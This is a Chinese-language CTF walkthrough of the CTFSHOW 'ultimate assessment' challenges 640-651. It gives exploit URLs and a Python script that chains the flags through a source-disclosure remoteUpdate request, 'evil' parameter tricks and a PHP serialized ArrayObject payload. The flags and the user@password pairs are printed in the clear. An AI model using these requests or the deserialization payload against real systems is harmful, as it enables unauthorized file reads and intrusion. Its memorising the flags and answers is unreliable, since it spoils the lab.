CTFSHOW 终极考核

随便玩玩

题目

640

签到

641

主页响应头中

642

主页敏感文件路径泄露

/system36d/

查看源码

643

644 进入之后使用网络抓包,抓包之后执行 ls 发现 secret.txt

/system36d/secret.txt

644

/system36d/static/js/lock/index.js

以及获得密码 0x36D

645

数据备份得到的 backup.dat 中

646

远程更新抓包,看看之前源码泄露发现的 init.php

/system36d/users.php?action=remoteUpdate&auth=ctfshow%7B28b00f799c2e059bafaa1d6bda138d89%7D&update_address=/var/www/html/system36d/init.php

647

/system36d/users.php?action=evilString&m=localeconv

648

/system36d/users.php?action=evilClass&m=1&key=flag_647=ctfshow{e6ad8304cdb562971999b476d8922219}

649

/system36d/users.php?action=evilNumber&m=16&key=flag_648=ctfshow{af5b5e411813eafd8dc2311df30b394e}

650

/system36d/users.php?action=evilFunction&m=localeconv&key=flag_649=ctfshow{9ad80fcc305b58afbb3a0c2097ac40ef}

651

/system36d/users.php?action=evilArray&m=C:11:"ArrayObject":58:{x:i:0;a:2:{s:8:"username";i:1;i:0;s:7:"ctfshow";};m:a:0:{}}&key=flag_650=ctfshow{5eae22d9973a16a0d37c9854504b3029}

652

一键脚本

import requests
from urllib import parse

# Base URL of the challenge instance. It ends with "/", and the helpers below
# append paths that begin with "/", so requests go out as "...:8080//system36d/...".
url = "http://fd74b994-4665-4bfa-8aa3-2226427c3240.challenge.ctf.show:8080/"

# Collected flags, keyed by challenge number; each ctf_NNN helper stores one entry.
flag = dict()

# Browser-like User-Agent sent with every request.
header = {
    "User-Agent": (
        "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) "
        "Chrome/67.0.3396.99 Safari/537.36"
    ),
}


def ctf_640(conn):
    """Fetch the home page and store flag 640.

    The flag is read from a fixed position in the body (line index 24 after
    splitting on newlines), so this relies on the page layout not changing.
    Prints an error and exits with status 123 on any non-200 response.
    """
    response = conn.get(url, headers=header)
    if response.status_code != 200:
        print("640 出错辣!")
        exit(123)
    body_lines = response.text.split("\n")
    flag[640] = body_lines[24]


def ctf_641(conn):
    """Fetch the home page and store flag 641 from the ``Flag`` response header.

    Prints an error and exits with status 123 on any non-200 response.
    """
    response = conn.get(url, headers=header)
    if response.status_code != 200:
        print("641 出错辣!")
        exit(123)
    flag[641] = response.headers["Flag"]


def ctf_642(conn):
    """Store flag 642, sliced from the remoteUpdate response for index.php.

    Requires ``flag[645]`` to be set already: its value, minus the
    ``flag_645=`` prefix, is sent as the ``auth`` parameter. Redirects are not
    followed. The flag is taken from characters 638-687 of the first response
    line, so it depends on the exact response layout.
    Prints an error and exits with status 123 on any non-200 response.
    """
    auth_value = flag[645].replace("flag_645=", "")
    target = (
        url
        + "/system36d/users.php?action=remoteUpdate&auth="
        + auth_value
        + "&update_address=/var/www/html/system36d/index.php"
    )
    response = conn.get(target, headers=header, allow_redirects=False)
    if response.status_code != 200:
        print("642 出错辣!")
        exit(123)
    first_line = response.text.split("\n")[0]
    flag[642] = first_line[638:688]


def ctf_643(conn):
    """Fetch /system36d/secret.txt and store its URL-decoded body as flag 643.

    Prints an error and exits with status 123 on any non-200 response.
    """
    response = conn.get(url + "/system36d/secret.txt", headers=header)
    if response.status_code != 200:
        print("643 出错辣!")
        exit(123)
    # The file content is percent-encoded; decode it before storing.
    flag[643] = parse.unquote(response.text)


def ctf_644(conn):
    """Fetch the lock-screen script and store flag 644 from it.

    The flag sits in a string literal assigned to the ``lock`` element on line
    index 45 of /system36d/static/js/lock/index.js; the surrounding JavaScript
    is stripped off with two literal replacements.
    Prints an error and exits with status 123 on any non-200 response.
    """
    response = conn.get(url + "/system36d/static/js/lock/index.js", headers=header)
    if response.status_code != 200:
        print("644 出错辣!")
        exit(123)
    script_lines = response.text.split("\n")
    assignment = script_lines[45]
    without_prefix = assignment.replace(" document.getElementById('lock').innerHTML='", "")
    flag[644] = without_prefix.replace("';", "")


def ctf_645(conn):
    """Request the ``backup`` action and store what remains as flag 645.

    A hard-coded run of known ``name@password`` entries is removed from the
    response, then every ``|`` separator is dropped. The stored value
    presumably still starts with ``flag_645=``, since ctf_642 and ctf_646
    strip that prefix before reusing it.
    Prints an error and exits with status 123 on any non-200 response.
    """
    response = conn.get(url + "/system36d/users.php?action=backup", headers=header)
    if response.status_code != 200:
        print("645 出错辣!")
        exit(123)
    known_entries = (
        "aab@aab|a1@bbb123|a2@bbb123|a3@bbb123|a4@bbb123|a5@bbb123|a6@bbb123|a11@bbb123"
        "|a111@bbb123|a112@bbb123|a113@bbb123|a114@bbb1234|admin@"
    )
    remainder = response.text.replace(known_entries, "")
    flag[645] = remainder.replace("|", "")


def ctf_646(conn):
    """Store flag 646, sliced from the remoteUpdate response for init.php.

    Requires ``flag[645]`` to be set already: its value, minus the
    ``flag_645=`` prefix, is sent as the ``auth`` parameter. The flag is taken
    from characters 431-479 of the body, so it depends on the exact response
    layout.
    Prints an error and exits with status 123 on any non-200 response.
    """
    auth_value = flag[645].replace("flag_645=", "")
    target = (
        url
        + "/system36d/users.php?action=remoteUpdate&auth="
        + auth_value
        + "&update_address=/var/www/html/system36d/init.php"
    )
    response = conn.get(target, headers=header)
    if response.status_code != 200:
        print("646 出错辣!")
        exit(123)
    flag[646] = response.text[431:480]


def ctf_647(conn):
    """Call the ``evilString`` action with ``m=localeconv`` and store the body as flag 647.

    Prints an error and exits with status 123 on any non-200 response.
    """
    endpoint = url + "/system36d/users.php?action=evilString&m=localeconv"
    response = conn.get(endpoint, headers=header)
    if response.status_code != 200:
        print("647 出错辣!")
        exit(123)
    flag[647] = response.text


def ctf_648(conn):
    """Call the ``evilClass`` action and store the body as flag 648.

    Requires ``flag[647]``, which is sent unchanged as the ``key`` parameter.
    Prints an error and exits with status 123 on any non-200 response.
    """
    endpoint = url + "/system36d/users.php?action=evilClass&m=1&key=" + flag[647]
    response = conn.get(endpoint, headers=header)
    if response.status_code != 200:
        print("648 出错辣!")
        exit(123)
    flag[648] = response.text


def ctf_649(conn):
    """Call the ``evilNumber`` action repeatedly and store the body as flag 649.

    Requires ``flag[648]``, which is sent unchanged as the ``key`` parameter.
    The same request is repeated for as long as the response contains
    "number is right?"; the first 200 response without that text is stored.
    Prints an error and exits with status 123 on any non-200 response.
    """
    endpoint = url + "/system36d/users.php?action=evilNumber&m=16&key=" + flag[648]
    # NOTE(review): there is no retry cap, delay or request timeout here, so
    # this loop runs until the server answers differently.
    while True:
        response = conn.get(endpoint, headers=header)
        if response.status_code != 200:
            print("649 出错辣!")
            exit(123)
        if "number is right?" not in response.text:
            flag[649] = response.text
            return


def ctf_650(conn):
    """Call the ``evilFunction`` action with ``m=localeconv`` and store the body as flag 650.

    Requires ``flag[649]``, which is sent unchanged as the ``key`` parameter.
    Prints an error and exits with status 123 on any non-200 response.
    """
    endpoint = (
        url + "/system36d/users.php?action=evilFunction&m=localeconv&key=" + flag[649]
    )
    response = conn.get(endpoint, headers=header)
    if response.status_code != 200:
        print("650 出错辣!")
        exit(123)
    flag[650] = response.text


def ctf_651(conn):
    """Call the ``evilArray`` action and store the body as flag 651.

    Requires ``flag[650]``, which is sent unchanged as the ``key`` parameter.
    The ``m`` parameter carries a fixed string in what looks like PHP's
    serialized-object notation for an ``ArrayObject``; it is passed through
    exactly as written.
    Prints an error and exits with status 123 on any non-200 response.
    """
    serialized = (
        'C:11:"ArrayObject":58:{x:i:0;a:2:{s:8:"username";i:1;i:0;s:7:"ctfshow";};m:a:0:{}}'
    )
    endpoint = (
        url
        + '/system36d/users.php?action=evilArray&m='
        + serialized
        + '&key='
        + flag[650]
    )
    response = conn.get(endpoint, headers=header)
    if response.status_code != 200:
        print("651 出错辣!")
        exit(123)
    flag[651] = response.text


if __name__ == "__main__":
    conn = requests.session()
    # Order matters: 642 and 646 reuse flag[645], and 648-651 each send the
    # previous flag as their key, so 642 runs after 645/646 instead of in
    # numeric order.
    steps = (
        ctf_640,
        ctf_641,
        ctf_643,
        ctf_644,
        ctf_645,
        ctf_646,
        ctf_642,
        ctf_647,
        ctf_648,
        ctf_649,
        ctf_650,
        ctf_651,
    )
    for step in steps:
        step(conn)
    # Print the collected flags in ascending challenge number.
    for number in sorted(flag):
        print(flag[number])